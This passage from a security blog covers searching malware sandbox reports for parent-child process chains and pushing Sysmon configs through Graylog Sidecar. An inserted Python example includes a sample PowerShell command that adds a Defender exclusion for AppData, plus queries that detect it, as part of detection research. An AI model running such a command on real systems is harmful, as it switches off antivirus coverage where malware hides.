I just hope this post helps anyone Googling things, because this sample has been called different things by different vendors and that's annoying. </div><div><br /></div><div><div>Part 1: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html</a></div><div>Part 2: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html</a></div></div><hr /><h1>Looking at process relationships from malware sandbox execution data</h1><p>Published 2022-10-15</p><p><b>Introduction:</b></p><p>This blog post discusses looking at process relationships, specifically from malware sandbox execution data. One of the essential functions of a malware sandbox is to gather and display process execution; for example, if winword launches powershell, you'd want to know that.</p><p>One issue that I run into while doing research is that many of the public/free malware sandboxes don't allow me to search based on process relationships. For example, if I have a sample on an endpoint that executed whoami, nslookup and systeminfo, I would like to be able to search sandbox reports to see which malware families or samples do that.</p><p>The other thing I'm interested in as a researcher is trends over time in initial access execution, for specific malware families or in general. One of the twitter accounts I follow is <a href="https://twitter.com/pr0xylife">https://twitter.com/pr0xylife</a> and they post information about how malware such as qakbot is doing command/process execution on a system. 
</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfZBQYazF0codzxbO1f4gAgQtc4vifvkskHuOwtKEekMr3dTcuR_SbTMYjuuY1fl_dFKFtobeQb31BrdTCJX9ntx37laQgc4fMh01FXfeok-fdnaXjdfa-QmBoJ4MXbAq9ntaDhUNMByzdHatcA_WreKPO__0JUy3pQdcWo4AZI7FF0CmdoeZANS5u" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="622" data-original-width="858" height="232" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfZBQYazF0codzxbO1f4gAgQtc4vifvkskHuOwtKEekMr3dTcuR_SbTMYjuuY1fl_dFKFtobeQb31BrdTCJX9ntx37laQgc4fMh01FXfeok-fdnaXjdfa-QmBoJ4MXbAq9ntaDhUNMByzdHatcA_WreKPO__0JUy3pQdcWo4AZI7FF0CmdoeZANS5u" width="320" /></a></div>I find the information interesting and obviously, the threat actors have made changes over time. Maybe the threat actors are using new LOLBINs more than before.<p></p><p>The final thing about process relationship data that can be useful is just looking for new things or rare executions. If you're collecting the data, you can do searches to look for rare executions.</p><p>All this research should be helpful with detection engineering too or with emulation, if you're trying to match a specific threat.</p><p><br /></p><p><b>POC Implementation:</b></p><p>As a proof-of-concept, I decided to implement a searchable database that lets me collect data from malware sandbox report and lets me search for parent-child process relationships. </p><p>I acquired my data from Hybrid-Analysis Public Feed, which gives you JSON file with around 250 recent malware analysis results. 
I also got data from the Zero2Auto CAPE sandbox (<a href="https://zero2auto.com/">https://zero2auto.com/</a>; thanks for letting me use the data!)</p><p><br /></p><p>I initially looked at graph databases, but asking graph databases questions/doing queries seemed annoying to me, so I didn't look into them too much.</p><p><br /></p><p>The second thing I tried was to join the process execution data in Python manually, which was a horrible idea. The code turned out horrible and the dataset wasn't fun to work with. (<a href="https://github.com/BoredHackerBlog/sandbox_process_relationships/blob/main/hybrid-analysis_public_feed.py">https://github.com/BoredHackerBlog/sandbox_process_relationships/blob/main/hybrid-analysis_public_feed.py</a>)</p><p><br /></p><p>CAPE and Hybrid-Analysis record process execution data differently, but one thing they have in common is a process list JSON object. Each process object has process metadata, the parent process ID and, obviously, the process ID. </p><p>I decided to use duckdb to analyze the data. (Usually I'd use sqlite, but I wanted to try out duckdb and it worked fine.)</p><p>I created a table with:</p><ul style="text-align: left;"><li>report id - specific execution task/detonation in the sandbox</li><li>process id</li><li>parent process id</li><li>process name</li><li>process path</li><li>process command line</li></ul><p>Then I loaded the results from CAPE or Hybrid-Analysis into the table. 
I'm loading the same type of data from both, but parsing their JSON reports is obviously different.</p><p>Finally, I created a view with a join that pairs each process with its parent: the rows must share the same report ID, and the child's parent process ID must equal the parent's process ID.</p><p>The resulting view contains:</p><ul style="text-align: left;"><li>Report ID</li><li>Parent Process ID</li><li>Parent Parent Process ID</li><li>Parent Name</li><li>Parent Path</li><li>Parent Command Line</li><li>Process ID</li><li>Process Name</li><li>Process Path</li><li>Process Command Line</li></ul><p>Gathering data from the sandbox reports and putting it in the database allows me to ask questions like these:<br /></p><ul style="text-align: left;"><li><b>what process launched ping?</b><span style="font-family: courier;"> select parent_name, proc_commandline from joined_proc_list where proc_commandline ilike '%ping.exe%';</span></li><li><b>what process launched powershell with a command line to add a Defender exclusion?</b> <span style="font-family: courier;">select parent_name, proc_commandline from joined_proc_list where proc_commandline ilike '%add-mppreference%';</span></li><li><b>what processes launch wscript? 
</b><span style="font-family: courier;">select parent_name, count(*) as count from joined_proc_list where proc_commandline ilike '%wscript%' group by parent_name</span></li><li><b>what does cmd.exe launch from the appdata folder?</b> <span style="font-family: courier;">select parent_name, proc_name from joined_proc_list where parent_name ilike '%cmd.exe%' AND proc_path ilike '%appdata%';</span></li></ul><p></p><p><br /></p><p>The results look kinda like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgsxUd0gsn2PK6EWnCv4OlDWkOMdWlIE1ZAnpQ2aSdDzYPY0-ai8eqLngdGiGTiVl8pARLW20ltNYw3UAdvLrEWTAeCkw4iwnYvpgrn5PWurzx4K6G3MPQ_rMIjVpaSkgF8lLKTTtGSkEMu_rIjoPbX-ZsCLUDu0UrE_v0Bxp7Ntd1RZDo6vzBdygoW" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="302" data-original-width="2722" height="72" src="https://blogger.googleusercontent.com/img/a/AVvXsEgsxUd0gsn2PK6EWnCv4OlDWkOMdWlIE1ZAnpQ2aSdDzYPY0-ai8eqLngdGiGTiVl8pARLW20ltNYw3UAdvLrEWTAeCkw4iwnYvpgrn5PWurzx4K6G3MPQ_rMIjVpaSkgF8lLKTTtGSkEMu_rIjoPbX-ZsCLUDu0UrE_v0Bxp7Ntd1RZDo6vzBdygoW=w640-h72" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3xcSn9Hqa-KZLKj6l1BIYJ8E2_MnedEpZnQRNigwqYOG74kLpgiippTYO224OZ14UfR-ToLiDlAXaftpZ7UBj5OxAAV61w3G64o-zWAYkdiCRJNNhGtv2Su44muF0BHbG4UlREwxQNHswURc_7SefKM8MNPZu_6XNo8rWbHj_avFVefzH8TT1is6j" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="520" data-original-width="3236" height="102" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3xcSn9Hqa-KZLKj6l1BIYJ8E2_MnedEpZnQRNigwqYOG74kLpgiippTYO224OZ14UfR-ToLiDlAXaftpZ7UBj5OxAAV61w3G64o-zWAYkdiCRJNNhGtv2Su44muF0BHbG4UlREwxQNHswURc_7SefKM8MNPZu_6XNo8rWbHj_avFVefzH8TT1is6j=w640-h102" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEiAzPiwRVoevJJuXOvX_x6ClSkT8wyVVMfK0PxhFP109uuF0vaqbVHr179cla6v02ABCN8erRWUndVbkhiR92I7Ea2uHG72dDMckt9CEYWnloMxEwlri80_pDmsVF4am6qvHHyPgbZejszR17zGTlMHCLeXX7gTzUSA3s17UR228OTWtxlV8FdGgdLh" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="598" data-original-width="1158" height="165" src="https://blogger.googleusercontent.com/img/a/AVvXsEiAzPiwRVoevJJuXOvX_x6ClSkT8wyVVMfK0PxhFP109uuF0vaqbVHr179cla6v02ABCN8erRWUndVbkhiR92I7Ea2uHG72dDMckt9CEYWnloMxEwlri80_pDmsVF4am6qvHHyPgbZejszR17zGTlMHCLeXX7gTzUSA3s17UR228OTWtxlV8FdGgdLh" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgKLP19U0pU3mUDv3D_ulrFkNhcmLdeLzh_D3vs18uF91s9RGPpJNLF6RaGeBOwhHXrLwgiNcxe_3klANbZTsrxl2H3BnvmoDMI7uAfN47BamjULuoga8kWagU8RJMxorF7p8Bg_GgDUIXi4dQ7lHWi8Q4zUuKeDhIloTcplt9GL3j7O8RQQDejVq-0" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="340" data-original-width="2494" height="88" src="https://blogger.googleusercontent.com/img/a/AVvXsEgKLP19U0pU3mUDv3D_ulrFkNhcmLdeLzh_D3vs18uF91s9RGPpJNLF6RaGeBOwhHXrLwgiNcxe_3klANbZTsrxl2H3BnvmoDMI7uAfN47BamjULuoga8kWagU8RJMxorF7p8Bg_GgDUIXi4dQ7lHWi8Q4zUuKeDhIloTcplt9GL3j7O8RQQDejVq-0=w640-h88" width="640" /></a></div><br /><br /><p></p><p>If you have large enough dataset, you can extract more info like malware or campaign name and etc and keep track of the trends.</p><p><br /></p><p><b>Other solutions:</b></p><p>If you already are doing malware execution in your sandbox, you can check if you are able to search based on process relationships. 
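The table, the join view and the four questions above, as an added, runnable Python example. This is my code, not the post's scripts or the linked repository. It uses the standard-library sqlite3 module in place of duckdb so it runs with no extra packages; the SQL is the same, except that SQLite's LIKE is already case-insensitive for ASCII, so it takes the place of duckdb's ILIKE. The process rows are constructed to look like a parsed CAPE or Hybrid-Analysis process list and are not real report data; the column names are my own choice.

```python
"""Parent/child process search over sandbox process lists.

Added example, not the post's code. Same table, join view and queries the
post describes, but on the standard-library sqlite3 module instead of
duckdb so it runs anywhere (SQLite LIKE is case-insensitive for ASCII, so it
stands in for duckdb's ILIKE). The rows below are constructed to look like a
parsed CAPE or Hybrid-Analysis process list; they are not real report data.
"""
import sqlite3
from typing import Iterable, List, Tuple

# (report_id, pid, ppid, name, path, cmdline)
ProcRow = Tuple[str, int, int, str, str, str]

SCHEMA = """
CREATE TABLE proc_list (
    report_id        TEXT NOT NULL,   -- one detonation / sandbox task
    proc_id          INTEGER NOT NULL,
    parent_proc_id   INTEGER NOT NULL,
    proc_name        TEXT,
    proc_path        TEXT,
    proc_commandline TEXT
);
-- Join each process to its parent within the same report. Caveat: if a
-- sandbox records pid reuse inside one task, a child can join to more than
-- one parent row; dedupe on process start time if your report carries one.
CREATE VIEW joined_proc_list AS
SELECT c.report_id,
       p.proc_id          AS parent_id,
       p.parent_proc_id   AS parent_parent_id,
       p.proc_name        AS parent_name,
       p.proc_path        AS parent_path,
       p.proc_commandline AS parent_commandline,
       c.proc_id,
       c.proc_name,
       c.proc_path,
       c.proc_commandline
FROM proc_list c
JOIN proc_list p
  ON p.report_id = c.report_id
 AND p.proc_id   = c.parent_proc_id;
"""

# Constructed sample: two reports with maldoc/script -> cmd -> LOLBIN chains.
# Root processes (ppid 1, no matching row) simply do not appear in the view.
SAMPLE_ROWS: List[ProcRow] = [
    ("r1", 100, 1,   "winword.exe",    r"C:\Program Files\Office\winword.exe", "winword.exe /n doc.docm"),
    ("r1", 200, 100, "cmd.exe",        r"C:\Windows\System32\cmd.exe", "cmd.exe /c start updater.exe"),
    ("r1", 300, 200, "updater.exe",    r"C:\Users\u\AppData\Roaming\updater.exe", "updater.exe"),
    ("r1", 400, 300, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -c Add-MpPreference -ExclusionPath C:\\Users\\u\\AppData"),
    ("r2", 500, 1,   "wscript.exe",    r"C:\Windows\System32\wscript.exe", "wscript.exe invoice.js"),
    ("r2", 600, 500, "cmd.exe",        r"C:\Windows\System32\cmd.exe", "cmd.exe /c ping.exe -n 5 127.0.0.1"),
    ("r2", 700, 600, "ping.exe",       r"C:\Windows\System32\PING.EXE", "ping.exe -n 5 127.0.0.1"),
]


def build_db(rows: Iterable[ProcRow]) -> sqlite3.Connection:
    """Create the in-memory database, load the rows and return the connection."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO proc_list VALUES (?, ?, ?, ?, ?, ?)", rows)
    con.commit()
    return con


def parents_of(con: sqlite3.Connection, pattern: str) -> List[Tuple[str, str]]:
    """Who launched a process whose command line matches pattern (LIKE syntax)?"""
    q = ("SELECT parent_name, proc_commandline FROM joined_proc_list "
         "WHERE proc_commandline LIKE ? ORDER BY report_id, proc_id")
    return con.execute(q, (pattern,)).fetchall()


def parent_counts(con: sqlite3.Connection, pattern: str) -> List[Tuple[str, int]]:
    """Parent-name frequency for children matching pattern, most common first."""
    q = ("SELECT parent_name, COUNT(*) AS n FROM joined_proc_list "
         "WHERE proc_commandline LIKE ? GROUP BY parent_name ORDER BY n DESC, parent_name")
    return con.execute(q, (pattern,)).fetchall()


def children_from_path(con: sqlite3.Connection, parent_like: str, path_like: str) -> List[Tuple[str, str]]:
    """What does a given parent launch out of a given directory (e.g. AppData)?"""
    q = ("SELECT parent_name, proc_name FROM joined_proc_list "
         "WHERE parent_name LIKE ? AND proc_path LIKE ? ORDER BY report_id, proc_id")
    return con.execute(q, (parent_like, path_like)).fetchall()


if __name__ == "__main__":
    db = build_db(SAMPLE_ROWS)
    print("ping launched by:", parents_of(db, "%ping.exe%"))
    print("Defender exclusion:", parents_of(db, "%add-mppreference%"))
    print("cmd.exe parents:", parent_counts(db, "%cmd.exe%"))
    print("cmd.exe -> AppData:", children_from_path(db, "%cmd.exe%", "%appdata%"))
```

Note that a pattern like '%ping.exe%' on the child's command line also matches the cmd.exe row that spawned ping, since its command line contains the string too; filter on proc_name instead when you want only the process itself.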
</p><p>You could also have a backend database that you can query, for example MongoDB or Elasticsearch, although I personally don't know about the join capabilities of those databases.</p><p>Alternatively, if your sandbox supports pushing data out to splunk, elasticsearch or any other place, you could try to work with that data. You could also intercept that data and send it to a webhook or lambda for additional processing.</p><p>If you have a system that supports pulling data, maybe through an API, that's also a solution: have a script that pulls reports, parses the data, and processes it.</p><p>You can store processed data in whatever database you feel comfortable utilizing. I would personally use Clickhouse or Postgresql if I were doing this. </p><p><br /></p><p><b>Links/Resources:</b></p><p>Code: <a href="https://github.com/BoredHackerBlog/sandbox_process_relationships">https://github.com/BoredHackerBlog/sandbox_process_relationships</a></p><p><a href="https://courses.zero2auto.com/">https://courses.zero2auto.com/</a></p><p><a href="https://www.hybrid-analysis.com/">https://www.hybrid-analysis.com/</a></p><p>Also check out Grapl - <a href="https://github.com/grapl-security/grapl">https://github.com/grapl-security/grapl</a></p><hr /><h1>Remotely managing Sysmon configuration through Graylog Sidecar</h1><p>Published 2022-08-18</p><h2 style="text-align: left;">Introduction:</h2><p>Sysmon is a tool from Microsoft that helps collect better logs about the system than the default Windows logs. The logs can be very helpful for detecting malicious behavior. Sysmon gets installed as a service and a driver, usually along with whatever configuration file you provided. </p><p>It can be kinda annoying to update the sysmon configuration, as sysmon doesn't come with a remote management system. 
If you have a group of PCs that need a different configuration, it can be a bit annoying to go push that out. </p><p>There are some options for updating sysmon configs. </p><ul style="text-align: left;"><li>You could set up a scheduled task that runs a script to look for a new config and applies the update. </li><li>You can also use EDR tools that you may already have in place to run scripts or commands to update sysmon. </li><li>You can utilize one of the Windows remote management features such as remote powershell. </li><li>Ansible would work too. It would let you update the sysmon config based on groups, as Ansible lets you put machines into groups.</li></ul><div>Some of the issues you may have with the update methods above are: </div><div><ul style="text-align: left;"><li>problems managing different groups of PCs </li><li>updates not being pushed out as soon as possible </li><li>having to open up ports/services on Windows that you'd rather not.</li></ul></div><p>I decided to go with Graylog sidecar for managing configuration. Graylog sidecar is usually used to manage configuration for log shippers (Beats for example), but it can be adapted to manage the sysmon configuration as well!! Sidecar runs as an agent that connects to the Graylog server to get sysmon config updates. </p><h2 style="text-align: left;">Tools:</h2><p>Graylog & sysmon, obviously.</p><p>You need a graylog server installed. 
You can technically use graylog sidecar without using graylog to store your windows or sysmon logs.</p><p>I'm using an admin account for the POC but use whatever the appropriate account is for your requirements.</p><h2 style="text-align: left;">Setting up sidecar:</h2><div>We'll manually set this up first but you can deploy sidecar agent and sysmon, and install both at the same time by creating a package or an initial installation script.</div><p>First, we'll need to create a sidecar token.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfYe_Ya-3IvnCXH73bHkA2DR7-tUIHl4-qsoSmUUxVO8yYlGw-S_h7Y98CQ4ppi2tE0ubPdE5AYd_YWP81dYuiCNUgLHQJBtz7LeROhfNWeXI4I2cqg8m1lUPThPH_9noG5psGHZqJ6-vM6m_-zAQIwm6L-__-UUITaKFqtKxla4-3SV2ZLLJ58bhn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="559" data-original-width="260" height="373" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfYe_Ya-3IvnCXH73bHkA2DR7-tUIHl4-qsoSmUUxVO8yYlGw-S_h7Y98CQ4ppi2tE0ubPdE5AYd_YWP81dYuiCNUgLHQJBtz7LeROhfNWeXI4I2cqg8m1lUPThPH_9noG5psGHZqJ6-vM6m_-zAQIwm6L-__-UUITaKFqtKxla4-3SV2ZLLJ58bhn=w174-h373" width="174" /></a></div><br />Go to the sidecars page, create a new token.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhMMAPhC0ZmUll9nrncONUJXvCMVbtubZMVzigYdNni3KY62_Uqa-47Qb_Xx87iLfZ5f6RbjKMB4kXcqtF0pM1NOzDfhrNrCVD3JVzmkczcP859OwLq9i5FHgbnP9FQEJPpWMJ8n2ZUsYgAgB3AmTY3uJCpvjHwfsLfSjZJolaGwBEWOJqX-q0EBRLw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="99" data-original-width="664" height="48" src="https://blogger.googleusercontent.com/img/a/AVvXsEhMMAPhC0ZmUll9nrncONUJXvCMVbtubZMVzigYdNni3KY62_Uqa-47Qb_Xx87iLfZ5f6RbjKMB4kXcqtF0pM1NOzDfhrNrCVD3JVzmkczcP859OwLq9i5FHgbnP9FQEJPpWMJ8n2ZUsYgAgB3AmTY3uJCpvjHwfsLfSjZJolaGwBEWOJqX-q0EBRLw" width="320" /></a></div><br /><div 
class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiNAICAulzRi7nGFiiu2hjJIxRl52VOIudzHtJRf1FJm__EgVxbYXMP3Du3gznji9EwStAp4E3IF-ObKr1WzLQ7_wL5o5geK1JYCuB4sWoT-fuMcUgs49FSyWQL8BlD8eNN4IeFrIGIJknt1Z5lwLKd5jk4Lh_OIpp5q21q8harpHnWJO4vnMyRWwDy" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="303" data-original-width="573" height="198" src="https://blogger.googleusercontent.com/img/a/AVvXsEiNAICAulzRi7nGFiiu2hjJIxRl52VOIudzHtJRf1FJm__EgVxbYXMP3Du3gznji9EwStAp4E3IF-ObKr1WzLQ7_wL5o5geK1JYCuB4sWoT-fuMcUgs49FSyWQL8BlD8eNN4IeFrIGIJknt1Z5lwLKd5jk4Lh_OIpp5q21q8harpHnWJO4vnMyRWwDy=w375-h198" width="375" /></a></div><br />Next, on Windows host, download and install sidecar agent<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0ieqc6pYcwe4-MYc_LkL3BiCY4SI5jY5WE3OaZLJHgHbGpRrbuMt8JQvU9accSEjReHVqUQAajKAobxPoFeRfN9QWsyO38YG_agS4Mkehk4WPN-2Zhhx6oqDn11-rx0cBFY07G340JGILvi4d1Y9ORzecNxefe5ESf1rKhIYJAYBuUXQiAunVMbWy" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="412" data-original-width="528" height="282" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0ieqc6pYcwe4-MYc_LkL3BiCY4SI5jY5WE3OaZLJHgHbGpRrbuMt8JQvU9accSEjReHVqUQAajKAobxPoFeRfN9QWsyO38YG_agS4Mkehk4WPN-2Zhhx6oqDn11-rx0cBFY07G340JGILvi4d1Y9ORzecNxefe5ESf1rKhIYJAYBuUXQiAunVMbWy=w362-h282" width="362" /></a></div><br />By default, Sidecar files are located at: <b>C:\Program Files\Graylog\sidecar</b><p></p><p>After installation, run the following commands (as admin) to install graylog as a service and start the service:</p><p>"C:\Program Files\graylog\sidecar\graylog-sidecar.exe" -service install</p><p>"C:\Program Files\graylog\sidecar\graylog-sidecar.exe" -service start</p><p>(you can do all of this automatically if you build a package for your organization)</p><p>The host should show up on Sidecar overview 
page</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjzXln5bxPuo7MvoNMm_O_LfaEN8AzUt7NLP0oBMFrdSdxBvLOsa201k7Uj_ImtUTpCxvcichZ7PFx3__Q6LjzUhAPO2YDsVcwt5L-lyZstlqzsKbyh1U3OnevwpmF-UvON3zvtQEsBoV4JYSz_HKPUO_IZHy0oSb5M5ujhoyQBaQ7zNIVCS5S5wDKu" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="332" data-original-width="804" height="163" src="https://blogger.googleusercontent.com/img/a/AVvXsEjzXln5bxPuo7MvoNMm_O_LfaEN8AzUt7NLP0oBMFrdSdxBvLOsa201k7Uj_ImtUTpCxvcichZ7PFx3__Q6LjzUhAPO2YDsVcwt5L-lyZstlqzsKbyh1U3OnevwpmF-UvON3zvtQEsBoV4JYSz_HKPUO_IZHy0oSb5M5ujhoyQBaQ7zNIVCS5S5wDKu=w395-h163" width="395" /></a></div><br /><br /><p></p><h2 style="text-align: left;">Setting up sysmon support on Windows host:</h2><p>Now that sidecar connection works fine, we need to setup sysmon. I'm placing sysmon executable at <b>C:\Program Files\Graylog\sidecar\sysmon64.exe (make sure its lower case or at least the case matches the sidecar.yml config file)</b></p><p>Next, we need to edit sidecar.yml file to allow the use of sysmon64.exe (again, you can build a package and include sidecar.yml file that already supports this)</p><p>Here's what I have in the config file:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiYn8lbuAiMVR8OFXBxhlCFjnyh4ZIo2QkRxifpdkVtzhWMeH-0oUb5IE5yz0xuHbHkxsSHbiE90TN7NNsGiKmaczeJ6RjPfZpfZlWAOIIrhM6HugLxZfQsdOOceVGsD5Vyc84g5wxoyefcScNL0dpezeWFJ-3i7dpvglQxWHLJcNrxVHigfIZvB3ul" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="81" data-original-width="517" height="64" src="https://blogger.googleusercontent.com/img/a/AVvXsEiYn8lbuAiMVR8OFXBxhlCFjnyh4ZIo2QkRxifpdkVtzhWMeH-0oUb5IE5yz0xuHbHkxsSHbiE90TN7NNsGiKmaczeJ6RjPfZpfZlWAOIIrhM6HugLxZfQsdOOceVGsD5Vyc84g5wxoyefcScNL0dpezeWFJ-3i7dpvglQxWHLJcNrxVHigfIZvB3ul=w412-h64" width="412" /></a></div><br 
 />Restart the Graylog sidecar service to ensure that it starts up again and that the sidecar.yml config file doesn't have any errors:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg5DhsP1xOCV5BDIAmDPrZVjFv0JiIKnmz2e96Lre722ja2iEzbgoaELGz28O_BfAcHLjOw9ovUjQYhh2paH_kdYNKh4gq8s6Y1b_EvPS9j-i1r7VBrlgHw_fcpJiYImANdXuL1niRfAQCxsWZkuottx_ZUACWL7srEpesz7_lNIB4rphwM6ltkgW4m" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="150" data-original-width="555" height="117" src="https://blogger.googleusercontent.com/img/a/AVvXsEg5DhsP1xOCV5BDIAmDPrZVjFv0JiIKnmz2e96Lre722ja2iEzbgoaELGz28O_BfAcHLjOw9ovUjQYhh2paH_kdYNKh4gq8s6Y1b_EvPS9j-i1r7VBrlgHw_fcpJiYImANdXuL1niRfAQCxsWZkuottx_ZUACWL7srEpesz7_lNIB4rphwM6ltkgW4m=w435-h117" width="435" /></a></div><br />Next, we need to install sysmon with an initial configuration (do this during the initial Graylog sidecar agent installation):<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjfYicVdMutHZugscSALyMbMfaARKxq6wNKBsk9Bh797nTTvkU-mCH7yjdxfViOEYD0q-drceFttcpMqQxjyL39VDOs6U_6ON1ZFmH0ShVBn0LOm8e57J8-jJJ70u4JST-M7vDeYM70uAcXhAnp_ex5Yu3B_c4MzPruLTxHRV5c7Pwrs82c3AkZVMFa" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="311" data-original-width="734" height="177" src="https://blogger.googleusercontent.com/img/a/AVvXsEjfYicVdMutHZugscSALyMbMfaARKxq6wNKBsk9Bh797nTTvkU-mCH7yjdxfViOEYD0q-drceFttcpMqQxjyL39VDOs6U_6ON1ZFmH0ShVBn0LOm8e57J8-jJJ70u4JST-M7vDeYM70uAcXhAnp_ex5Yu3B_c4MzPruLTxHRV5c7Pwrs82c3AkZVMFa=w416-h177" width="416" /></a></div><br />Now we can set up a sysmon configuration in sidecar to push updates.<p></p><h2 style="text-align: left;">Setting up sysmon sidecar configuration in Graylog:</h2><p>Go to the Collectors Configuration page in Graylog and click the Create Log Collector button.</p><p></p><div class="separator" style="clear: 
 both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgBzss-pHrsJpJiBiJJC6CSABeS2b6Xm49SMKRKPFSTjxEOrKTdLrG3uS6oQs71Qip52n_kNmG7oMNOSS02YyYjOYmCrdW3JoTZHt8hu8b0jYG6Y1mchZorur8Fh_eAWkYMzXSBD4ZkmCBpyv4G97PlHUb2LwpVzjzidM-u-b3opOIxoCYXNM4vxNbm" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="600" data-original-width="746" height="287" src="https://blogger.googleusercontent.com/img/a/AVvXsEgBzss-pHrsJpJiBiJJC6CSABeS2b6Xm49SMKRKPFSTjxEOrKTdLrG3uS6oQs71Qip52n_kNmG7oMNOSS02YyYjOYmCrdW3JoTZHt8hu8b0jYG6Y1mchZorur8Fh_eAWkYMzXSBD4ZkmCBpyv4G97PlHUb2LwpVzjzidM-u-b3opOIxoCYXNM4vxNbm=w356-h287" width="356" /></a></div><br />Create something that looks like this:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgPi9m67elykNdt5J4V1VHLdXlK4IIxq_fLw3fjL-9gfR9pZ6jmaQgpdm8A9081Ro1Qmdamag3BOexdVuyMqqtTBSJNgQVGDxXwlUUlJUMa2lSSk92pTfWxKaCJF7Djk9INRMN_IQPlFIv-NLO1UjFrVxwD77YZRFtrImgY0v9zaxKiDcssgFWiTfW4" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="932" data-original-width="729" height="523" src="https://blogger.googleusercontent.com/img/a/AVvXsEgPi9m67elykNdt5J4V1VHLdXlK4IIxq_fLw3fjL-9gfR9pZ6jmaQgpdm8A9081Ro1Qmdamag3BOexdVuyMqqtTBSJNgQVGDxXwlUUlJUMa2lSSk92pTfWxKaCJF7Djk9INRMN_IQPlFIv-NLO1UjFrVxwD77YZRFtrImgY0v9zaxKiDcssgFWiTfW4=w411-h523" width="411" /></a></div><br />We're using foreground execution since we just need to run the command that updates the sysmon config and then exit.<p></p><p>The update command is <b>sysmon -c CONFIG_FILENAME</b>, so the execute parameter is -c "%s": sidecar replaces %s with the path of our config file once it has written that file to disk.</p><p>The default template can be used to ship a default config, but I'm leaving it empty here.</p><p>Next, on the Collectors Configuration page, click Create Configuration.</p><p></p><div class="separator" style="clear: both; 
text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhjHoI7nBUSwNBOOCk4_QfswTKOClbbAdZqDnMqA9PyJ3LTEZbhtI6VDfGQRg33smrZ0KSylNhOQVIX09KXE-25ziQKPUZuJDnoUO4FzAjbVnf0yfhlBDicq4lQB0eT0vge7mfgT8wOl_AOxgOYMupUyLhiUd-IurKAOlTlEZeO1XosaOEAR94-o7EU" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="934" data-original-width="1275" height="422" src="https://blogger.googleusercontent.com/img/a/AVvXsEhjHoI7nBUSwNBOOCk4_QfswTKOClbbAdZqDnMqA9PyJ3LTEZbhtI6VDfGQRg33smrZ0KSylNhOQVIX09KXE-25ziQKPUZuJDnoUO4FzAjbVnf0yfhlBDicq4lQB0eT0vge7mfgT8wOl_AOxgOYMupUyLhiUd-IurKAOlTlEZeO1XosaOEAR94-o7EU=w576-h422" width="576" /></a></div><br />Name your configuration and add the xml config content.<p></p><p>You can create and add more configurations for different systems you may have.</p><h2 style="text-align: left;">Pushing configuration to a host:</h2><p>Go to the sidecar Administration page</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg1udc_OSEWuAohjONARGALw5ZC6K6A1xy-v-p5gEZXQmP_3aa077kNGeUqyRp7h7aFdErxYJQ0FGXoPakF69oETnwtNsYZnxyez7HPSaMKVeaAOAHV68I6RffheaSwtRvc1aPVo7-_i9kiuqqC5UsbnS1_ZWhMUQGBhlJXcIDUWB721QbjZlDnrdX6" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="555" data-original-width="922" height="222" 